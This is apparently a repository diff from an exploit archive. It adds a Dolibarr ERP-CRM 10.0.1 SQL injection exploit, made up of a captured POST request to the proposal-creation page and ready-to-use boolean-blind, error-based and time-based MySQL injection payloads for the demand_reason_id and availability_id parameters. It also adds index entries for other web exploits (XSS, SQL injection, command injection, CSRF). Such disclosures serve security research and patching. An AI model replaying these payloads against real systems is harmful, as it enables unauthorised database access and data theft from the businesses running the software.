|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer:
|
||||||
|
http://localhost/dolibarr-10.0.1/htdocs/comm/propal/card.php?action=create&leftmenu=propals
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 471
|
||||||
|
Cookie:
|
||||||
|
DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3
|
||||||
|
Connection: close
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
token=%242y%2410%24L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09%2F09%2F2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=[SQLi]&availability_id=[SQLi]&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Parameter: demand_reason_id (POST)
|
||||||
|
Type: boolean-based blind
|
||||||
|
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
|
||||||
|
GROUP BY clause
|
||||||
|
Payload:
|
||||||
|
token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0
|
||||||
|
RLIKE (SELECT (CASE WHEN (8405=8405) THEN 0 ELSE 0x28
|
||||||
|
END))&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty
|
||||||
|
|
||||||
|
Type: error-based
|
||||||
|
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
|
||||||
|
BY clause (FLOOR)
|
||||||
|
Payload:
|
||||||
|
token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0
|
||||||
|
OR (SELECT 8076 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT
|
||||||
|
(ELT(8076=8076,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
|
||||||
|
INFORMATION_SCHEMA.PLUGINS GROUP BY
|
||||||
|
x)a)&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty
|
||||||
|
|
||||||
|
.
|
||||||
|
.
|
||||||
|
|
||||||
|
Parameter: availability_id (POST)
|
||||||
|
Type: boolean-based blind
|
||||||
|
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
|
||||||
|
GROUP BY clause
|
||||||
|
Payload:
|
||||||
|
token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
|
||||||
|
RLIKE (SELECT (CASE WHEN (6909=6909) THEN 0 ELSE 0x28
|
||||||
|
END))&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty
|
||||||
|
|
||||||
|
Type: error-based
|
||||||
|
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
|
||||||
|
BY clause (FLOOR)
|
||||||
|
Payload:
|
||||||
|
token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
|
||||||
|
OR (SELECT 3789 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT
|
||||||
|
(ELT(3789=3789,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
|
||||||
|
INFORMATION_SCHEMA.PLUGINS GROUP BY
|
||||||
|
x)a)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty
|
||||||
|
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload:
|
||||||
|
token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
|
||||||
|
AND (SELECT 9904 FROM
|
||||||
|
(SELECT(SLEEP(5)))ZKPW)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty
|
|
@ -41708,3 +41708,12 @@ id,file,description,date,author,type,platform,port
|
||||||
47350,exploits/php/webapps/47350.txt,"WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting",2019-09-04,MgThuraMoeMyint,webapps,php,80
|
47350,exploits/php/webapps/47350.txt,"WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting",2019-09-04,MgThuraMoeMyint,webapps,php,80
|
||||||
47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80
|
47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80
|
||||||
47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php,
|
47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php,
|
||||||
|
47361,exploits/php/webapps/47361.pl,"WordPress 5.2.3 - Cross-Site Host Modification",2019-09-09,"Todor Donev",webapps,php,
|
||||||
|
47362,exploits/php/webapps/47362.txt,"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,
|
||||||
|
47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,mark,webapps,multiple,
|
||||||
|
47364,exploits/multiple/webapps/47364.py,"Enigma NMS 65.0.0 - OS Command Injection",2019-09-09,mark,webapps,multiple,
|
||||||
|
47365,exploits/multiple/webapps/47365.txt,"Enigma NMS 65.0.0 - SQL Injection",2019-09-09,mark,webapps,multiple,
|
||||||
|
47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,
|
||||||
|
47368,exploits/cgi/webapps/47368.sh,"Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure",2019-09-09,LiquidWorm,webapps,cgi,
|
||||||
|
47369,exploits/php/webapps/47369.txt,"WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting",2019-09-09,"Mr Winst0n",webapps,php,
|
||||||
|
47370,exploits/php/webapps/47370.txt,"Dolibarr ERP-CRM 10.0.1 - SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue